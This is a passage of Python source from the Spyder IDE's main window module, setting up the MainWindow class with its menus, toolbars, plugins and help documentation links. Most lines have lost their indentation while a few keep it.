        if not osp.isdir(doc_path):
            return
        # Fix: escape the dot -- the original pattern "Python[0-9]{3,6}.chm"
        # let '.' match any character (e.g. "Python276Xchm" would match).
        python_chm = [path for path in os.listdir(doc_path)
                      if re.match(r"(?i)Python[0-9]{3,6}\.chm", path)]
        if python_chm:
            return file_uri(osp.join(doc_path, python_chm[0]))
    else:
        vinf = sys.version_info
        doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
        python_doc = osp.join(doc_path, "index.html")
        if osp.isfile(python_doc):
            return file_uri(python_doc)
def get_focus_python_shell():
    """Extract and return Python shell from widget
    Return None if *widget* is not a Python shell (e.g. IPython kernel)"""
    widget = QApplication.focusWidget()
    # Widget classes are imported lazily (see the NOTE above about deferring
    # widget imports to reduce perceived startup time)
    from spyder.widgets.shell import PythonShellWidget
    from spyder.widgets.externalshell.pythonshell import ExternalPythonShell
    if isinstance(widget, PythonShellWidget):
        return widget
    elif isinstance(widget, ExternalPythonShell):
        # External shells expose the actual Python shell as .shell
        return widget.shell
def get_focus_widget_properties():
    """Get properties of focus widget
    Returns tuple (widget, properties) where properties is a tuple of
    booleans: (is_console, not_readonly, readwrite_editor);
    properties is None when the focus widget is neither a shell nor an editor."""
    widget = QApplication.focusWidget()
    # Widget classes are imported lazily (see the NOTE above about deferring
    # widget imports to reduce perceived startup time)
    from spyder.widgets.shell import ShellBaseWidget
    from spyder.widgets.editor import TextEditBaseWidget
    textedit_properties = None
    if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget)):
        console = isinstance(widget, ShellBaseWidget)
        not_readonly = not widget.isReadOnly()
        readwrite_editor = not_readonly and not console
        textedit_properties = (console, not_readonly, readwrite_editor)
    return widget, textedit_properties
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
SPYDER_PATH = get_conf_path('path')
BOOKMARKS = (
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/",
_("PyQt4 Reference Guide")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/classes.html",
_("PyQt4 API Reference")),
('xy', "http://code.google.com/p/pythonxy/",
_("Python(x,y)")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
# Set Window title and icon
if DEV is not None:
title = "Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = "Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += " [DEBUG MODE %d]" % DEBUG
if options.window_title is not None:
title += ' -- ' + options.window_title
self.base_title = title
self.update_window_title()
resample = os.name != 'nt'
icon = ima.icon('spyder', resample=resample)
# Resampling SVG icon only on non-Windows platforms (see Issue 1314):
self.setWindowIcon(icon)
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# Track which console plugin type had last focus
# True: Console plugin
# False: IPython console plugin
self.last_console_plugin_focus_was_python = True
# To keep track of the last focused widget
self.last_focused_widget = None
# Server to open external files on a single instance
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
    def debug_print(self, message):
        """Forward *message* to the module-level ``debug_print`` helper."""
        debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, None,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# Python(x,y) launcher
self.xy_action = create_action(self,
_("Python(x,y) launcher"),
icon=get_icon('pythonxy.png'),
triggered=lambda:
programs.run_python_script('xy', 'xyhome'))
if os.name == 'nt' and is_module_installed('xy'):
self.external_tools_menu_actions.append(self.xy_action)
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
qteact = create_python_script_action(self,
_("Qt examples"), 'qt.png', "PyQt4",
osp.join("examples", "demos",
"qtdemo", "qtdemo"), args)
for act in (qtdact, qtlact, qteact):
if act:
additact.append(act)
if additact and (is_module_installed('winpython') or \
is_module_installed('xy')):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except (ImportError, AssertionError):
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except (ImportError, AssertionError):
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
fullpath_sorting = CONF.get('editor', 'fullpath_sorting', True)
self.outlineexplorer = OutlineExplorer(self,
fullpath_sorting=fullpath_sorting)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [None, restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
if CONF.get('project_explorer', 'enable'):
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# External console
self.set_splash(_("Loading external console..."))
from spyder.plugins.externalconsole import ExternalConsole
self.extconsole = ExternalConsole(self, light_mode=False)
self.extconsole.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
if QTCONSOLE_INSTALLED:
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
nsb = self.variableexplorer.add_shellwidget(self.console.shell)
self.console.shell.refresh.connect(nsb.refresh_table)
nsb.auto_refresh_button.setEnabled(False)
self.set_splash(_("Setting up main window..."))
# Help menu
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_path = get_module_data_path('spyder', relpath="doc",
attr_name='DOCPATH')
# * Trying to find the chm doc
spyder_doc = osp.join(doc_path, "Spyderdoc.chm")
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, os.pardir, "Spyderdoc.chm")
# * Trying to find the html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, "index.html")
# * Trying to find the development-version html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(get_module_source_path('spyder'),
os.pardir, 'build', 'lib', 'spyder',
'doc', "index.html")
# * If we totally fail, point to our web build
if not osp.isfile(spyder_doc):
spyder_doc = 'http://pythonhosted.org/spyder'
else:
spyder_doc = file_uri(spyder_doc)
doc_action = create_action( self, _("Spyder documentation"), shortcut="F1",
icon=ima.icon('DialogHelpButton'),
triggered=lambda : programs.start_file(spyder_doc))
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
if not DEV:
self.tours_menu = None
self.help_menu_actions = [doc_action, tut_action, self.tours_menu,
None, report_action, dep_action,
self.check_updates_action, support_action,
None]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.ipyconsole is not None and self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Documentation provided by Python(x,y), if available
try:
from xy.config import DOC_PATH as xy_doc_path
xydoc = osp.join(xy_doc_path, "Libraries")
def add_xydoc(text, pathlist):
for path in pathlist:
if osp.exists(path):
add_ipm_action(text, path)
break
add_xydoc(_("Python(x,y) documentation folder"),
[xy_doc_path])
add_xydoc(_("IPython documentation"),
[osp.join(xydoc, "IPython", "ipythondoc.chm")])
add_xydoc(_("guidata documentation"),
[osp.join(xydoc, "guidata", "guidatadoc.chm"),
r"D:\Python\guidata\build\doc_chm\guidatadoc.chm"])
add_xydoc(_("guiqwt documentation"),
[osp.join(xydoc, "guiqwt", "guiqwtdoc.chm"),
r"D:\Python\guiqwt\build\doc_chm\guiqwtdoc.chm"])
add_xydoc(_("Matplotlib documentation"),
[osp.join(xydoc, "matplotlib", "Matplotlibdoc.chm"),
osp.join(xydoc, "matplotlib", "Matplotlib.pdf")])
add_xydoc(_("NumPy documentation"),
[osp.join(xydoc, "NumPy", "numpy.chm")])
add_xydoc(_("NumPy reference guide"),
[osp.join(xydoc, "NumPy", "numpy-ref.pdf")])
add_xydoc(_("NumPy user guide"),
[osp.join(xydoc, "NumPy", "numpy-user.pdf")])
add_xydoc(_("SciPy documentation"),
[osp.join(xydoc, "SciPy", "scipy.chm"),
osp.join(xydoc, "SciPy", "scipy-ref.pdf")])
except (ImportError, KeyError, RuntimeError):
pass
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [None, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
None))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (None,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
None,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (None, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'search', 'source', 'run', 'debug',
'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
child.aboutToShow.connect(self.update_edit_menu)
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
    def post_visible_setup(self):
        """Actions to be performed only after the main window's `show` method
        was triggered"""
        self.restore_scrollbar_position.emit()
        # Remove our temporary dir
        atexit.register(self.remove_tmpdir)
        # [Workaround for Issue 880]
        # QDockWidget objects are not painted if restored as floating
        # windows, so we must dock them before showing the mainwindow,
        # then set them again as floating windows here.
        for widget in self.floating_dockwidgets:
            widget.setFloating(True)
        # In MacOS X 10.7 our app is not displayed after initialized (I don't
        # know why because this doesn't happen when started from the terminal),
        # so we need to resort to this hack to make it appear.
        if running_in_mac_app():
            idx = __file__.index(MAC_APP_NAME)
            app_path = __file__[:idx]
            subprocess.call(['open', app_path + MAC_APP_NAME])
